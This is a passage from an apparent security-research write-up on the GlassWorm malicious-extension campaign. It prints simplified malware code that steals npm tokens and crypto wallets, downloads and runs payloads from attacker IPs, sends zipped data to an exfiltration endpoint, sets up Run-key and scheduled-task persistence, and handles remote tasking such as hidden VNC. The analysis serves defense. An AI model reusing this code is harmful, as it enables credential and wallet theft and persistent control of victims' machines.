aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">class NpmTokenHandler {\r\n  retrieveNpmToken() {\r\n    const methods = [\r\n      this.getFromNpmConfig.bind(this),\r\n      this.getFromNpmrcFile.bind(this),\r\n      this.getFromEnv.bind(this)\r\n    ];\r\n    for (const method of methods) {\r\n      const token = method();\r\n      if (token) return token;\r\n    }\r\n    return null;\r\n  }\r\n}\r\n\r\nfetch(&#039;https:\/\/registry.npmjs.org\/-\/whoami&#039;, {\r\n  headers: { Authorization: `Bearer ${this.token}` }\r\n});\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Cryptocurrency wallet targeting<\/h3>\n\n\n\n<p>It contains a large built-in mapping of browser and desktop wallet targets, including MetaMask, Phantom, Coinbase, Exodus, Trust Wallet, and many others, and searches profile directories and extension storage paths for matching wallet data, including browser extension storage and desktop wallet locations.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">var EXTENSION_IDENTIFIERS = {\r\n  MetaMask: &#039;nkbihfbeogaeaoehlefnkodbefgpgknn&#039;,\r\n  Phantom: &#039;bfnaelmomeimhlpmgjnjophhpkkoljpa&#039;,\r\n  Coinbase: &#039;hnfanknocfeofbddgcijnmhnfnkdnaad&#039;,\r\n  Ronin: &#039;fnjhmkhhmkbjkkabndcnnogagogbneec&#039;,\r\n  Trust_Wallet: &#039;egjidjbpglichdcondbcbdnbeeppgdph&#039;,\r\n  Solflare: &#039;bhhhlbepdkbapadjdnnojkbgioiodbic&#039;\r\n};\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Archive download, decryption, and native module loading<\/h3>\n\n\n\n<p>The second-stage payload also downloads an archive from the same infrastructure, decrypts a bundled module with AES, and launches it through Node.js.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div 
class=\"section-gutenberg-code-highlight__toolbar-left\">\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_ea9331e3c3b3cbf9631b9a3d95f698f5\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_ea9331e3c3b3cbf9631b9a3d95f698f5\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n           
             <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">http.get(&#039;http:\/\/45.32.150.251\/get_arhive_npm\/wBTsMvl78kbdYOVuAeE0Fw%3D%3D&#039;, (res) =&gt; {\r\n  \/\/ download archive\r\n});\r\n\r\nconst _decipher = crypto.createDecipheriv(&#039;aes-128-cbc&#039;, _key, _iv);\r\nconst _decryptedData = Buffer.concat([\r\n  _decipher.update(Buffer.from(_data)),\r\n  _decipher.final()\r\n]);\r\n\r\nchildProcess.exec(`${path_node_g} -e &quot;eval(atob(&#039;${_script}&#039;))&quot;`);\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Exfiltration, Ledger targeting, and persistence<\/h3>\n\n\n\n<p>Finally, the staged data is compressed into a ZIP archive and sent to a dedicated exfiltration endpoint at <code>208[.]85[.]20[.]124:80\/wall<\/code>, with retry logic if the upload fails.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" 
data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">const zip = new AdmZip();\r\nzip.addLocalFolder(_tempF);\r\nlet willSendThis = zip.toBuffer();\r\n\r\nconst options = {\r\n  hostname: &quot;208.85.20.124&quot;,\r\n  port: 80,\r\n  path: &quot;\/wall&quot;,\r\n  method: &quot;POST&quot;\r\n};\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The payload also contains Ledger-specific logic. 
If Ledger Live is present under <code>%APPDATA%<\/code>, it downloads an additional executable from <code>http[:]\/\/45[.]32[.]150[.]251\/led-win32<\/code>, writes it to <code>%TEMP%\\TvVdSR.exe<\/code>, creates a Run key named UpdateLedger, and launches the dropped file.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">if (fs.existsSync(path.join(process.env.APPDATA, &quot;Ledger Live&quot;))) {\r\n  http.get(&quot;http:\/\/45.32.150.251\/led-win32&quot;, (res) =&gt; {\r\n    const _path = path.join(process.env.TEMP, &quot;TvVdSR.exe&quot;);\r\n    fs.writeFileSync(_path, data);\r\n\r\n    const ps1 = `$rPath = &#039;HKCU:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run&#039;;\r\n      New-ItemProperty -Path $rPath -Name &#039;UpdateLedger&#039; -PropertyType String -Value &#039;${_path}&#039; -Force`;\r\n  
});\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>In addition, the decoded payload builds a second-stage persistence script named script_zombi. That script writes files under <code>%APPDATA%<\/code>, creates a hidden PowerShell-based startup path, creates a scheduled task named UpdateApp, and adds a <code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run<\/code> entry so the malware is relaunched on user logon and survives reboots.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"auto\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-auto\">\/\/ inside script_zombi\r\nschtasks \/create \/tn &quot;UpdateApp&quot; \/tr &quot;powershell 
-ExecutionPolicy Bypass -File ${ps1Path}&quot; \/sc onstart \/rl highest \/f\r\n$rPath = &quot;HKCU:\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run&quot;\r\n$command = &quot;powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File ${ps1Path}&quot;\r\nNew-ItemProperty -Path $rPath -Name $randomName -PropertyType String -Value $command -Force<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-3\">Stage 2<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">How the chain continues after Google Calendar<\/h3>\n\n\n\n<p>The code fetched during the Google Calendar stage serves as both a collection and delivery component. It downloads additional modules, extracts browser and wallet data, compresses and encrypts the results, and sends them back to attacker-controlled infrastructure. It also includes real-time communication and peer-to-peer components, namely:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>socket[.]io-client<\/code><\/li>\n\n\n\n<li><code>engine[.]io-client<\/code><\/li>\n\n\n\n<li><code>ws<\/code><\/li>\n\n\n\n<li><code>k-rpc-socket<\/code><\/li>\n\n\n\n<li><code>bittorrent-dht<\/code><\/li>\n<\/ul>\n\n\n\n<p>It even references public DHT bootstrap nodes including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>router[.]bittorrent[.]com<\/code><\/li>\n\n\n\n<li><code>router[.]utorrent[.]com<\/code><\/li>\n\n\n\n<li><code>dht[.]transmissionbt[.]com<\/code><\/li>\n<\/ul>\n\n\n\n<p>Additionally, it performs another Solana memo lookup against the hardcoded wallet address <code>BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC<\/code> and uses the returned memo data to continue the execution chain. 
Here, the RPC provider list is rebuilt again, this time expanded with additional endpoints such as:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>https[:]\/\/public[.]rpc[.]solanavibestation[.]com<\/code><\/li>\n\n\n\n<li><code>https[:]\/\/sol-protect[.]rpc[.]blxrbdn[.]com<\/code><\/li>\n<\/ul>\n\n\n\n<p>This same wallet was also mentioned in public reporting by <a href=\"https:\/\/www.koi.ai\/blog\/glassworm-goes-mac-fresh-infrastructure-new-tricks\">Koi<\/a>, as well as in later reporting by <a href=\"https:\/\/socket.dev\/blog\/glassworm-loader-hits-open-vsx-via-suspected-developer-account-compromise\">Socket<\/a> on the oorzc case.<\/p>\n\n\n\n<p>The snippet below shows how the malware downloads an archive from <code>http[:]\/\/45[.]32[.]150[.]251\/get_arhive_npm\/wBTsMvl78kbdYOVuAeE0Fw%3D%3D<\/code>, extracts it, decrypts its contents, and executes the next flow:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre 
class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">fetch(atob(AGeZdIX2[&quot;_ASAR_ARHIVE_&quot;]))\r\n  .then((r) =&gt; r.arrayBuffer())\r\n  .then(async (r) =&gt; {\r\n    fs.writeFileSync(arhivePath, Buffer.from(r));\r\n    new AdmZip(arhivePath).extractAllTo(unzipPATH);\r\n\r\n    const decipher = crypto.createDecipheriv(&quot;aes-128-cbc&quot;, _key, _iv);\r\n    const decryptedData = Buffer.concat([\r\n      decipher.update(Buffer.from(data)),\r\n      decipher.final()\r\n    ]);\r\n\r\n    child_process.exec(`start \/B ${path_node} -e &quot;eval(atob(&#039;${btoa(script2)}&#039;))&quot;`);\r\n  });\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The same stage also handles interactive remote commands, including hidden VNC, SOCKS proxying, system information collection, and execution of a Base64-decoded payload delivered in the command field:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div 
class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">if (wrPQKF.type == &quot;start_hvnc&quot;) {\r\n  RmYcPxyOw(AGeZdIX_dht);\r\n  return;\r\n}\r\n\r\nif (wrPQKF.type == &quot;start_socks&quot;) {\r\n  downloadManager.setHandler(&quot;start_socks&quot;);\r\n  downloadManager._x64_downloadAndRunFile(AGeZdIX_dht);\r\n  return;\r\n}\r\n\r\nif (wrPQKF.type == &quot;get_system_info&quot;) {\r\n  io_emitter.emit(&quot;task&quot;, { type: wrPQKF.type, value: JSON.stringify(getSystemInfo()) });\r\n  return;\r\n}\r\n\r\nif (wrPQKF?.command) {\r\n  eval(atob(wrPQKF.command));\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>It also supports <code>stop_hvnc<\/code> and <code>stop_socks<\/code>, which shows that this part of the malware is built to receive and act on remote tasking rather than simply fetch another payload.<\/p>\n\n\n\n<p>The code also includes BitTorrent DHT and persistent socket communication components, which help support that control layer:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">\/\/ bundled modules observed in the recovered stage:\r\n\/\/ - k-rpc-socket\r\n\/\/ - bittorrent-dht\r\n\/\/ - engine.io-client\r\n\/\/ - socket.io-client\r\n\/\/ - ws\r\n\r\nbootstrap: [\r\n  &quot;dht[.]libtorrent[.]org[:]25401&quot;,\r\n  &quot;router[.]bittorrent[.]com[:]6881&quot;,\r\n  &quot;router[.]utorrent[.]com[:]6881&quot;\r\n]\r\n\r\n\/\/ Note: strings above modified by Checkmarx Zero for safety\r\n\/\/       domains and ports have been [bracketed] to avoid accidental use.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>Before transmission, the collected data is compressed into a ZIP archive and then encrypted:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div 
class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n      
          <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n   
                 <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 
17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_8752e938df26926dfb5247de07d232f3\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_8752e938df26926dfb5247de07d232f3\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n           
             <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">const zip2 = new AdmZip();\r\nzip2.addLocalFolder(path.join(process.env.TEMP, &quot;AGeZdIX&quot;));\r\nconst willSendThis = zip2.toBuffer();\r\n\r\nconst key = crypto.randomBytes(32);\r\nconst iv = crypto.randomBytes(16);\r\nconst cipher = crypto.createCipheriv(&quot;aes-256-cbc&quot;, key, iv);\r\nconst encrypted = Buffer.concat([cipher.update(willSendThis), cipher.final()]);\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-4\">Closing thoughts<\/h2>\n\n\n\n<p>GlassWorm stands out not because every new wave introduces an entirely new design, but because the campaign keeps adapting while preserving the same operational skeleton. Some relied on invisible Unicode tricks, others on wrapper-based obfuscation, dynamic reconstruction, or layered decoding. 
Yet the core behavior remained stable:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>malicious VS Code and Open VSX extensions as the initial access point<\/li>\n\n\n\n<li>Solana memo-based stage discovery<\/li>\n\n\n\n<li>Russian locale evasion<\/li>\n\n\n\n<li>staged payload retrieval<\/li>\n\n\n\n<li>dynamic execution inside the extension runtime<\/li>\n\n\n\n<li>wallet theft, npm token theft, persistence, and exfiltration<\/li>\n<\/ul>\n\n\n\n<p>Earlier reporting highlighted GlassWorm\u2019s use of invisible Unicode characters. One of the VS Code extensions in this set still used that same concealment method while reusing a Solana address seen in previous campaign activity. At the same time, the others make clear that the campaign is no longer dependent on a single concealment technique. The wrapper changes, but the execution pattern remains recognizable.<\/p>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-5\">What should you do about GlassWorm?<\/h2>\n\n\n\n<p>Organizations and developers should add the identified IOCs to both network and endpoint defenses, including domains, IP addresses, wallet addresses, dropped filenames, scheduled task names, and registry keys.<\/p>\n\n\n\n<p>They should also search for signs of these extensions and their later-stage activity across developer environments. This means looking for the reported extension identifiers in VS Code and Open VSX extension directories, suspicious files written under user profile and AppData paths, unexpected Run key entries, scheduled tasks, dropped files, and outbound connections to the recovered infrastructure.<\/p>\n\n\n\n<p>If evidence of infection is found, affected developers should rotate any credentials that may have been exposed, especially npm, GitHub, GitLab, cloud, and other publishing or developer tokens. 
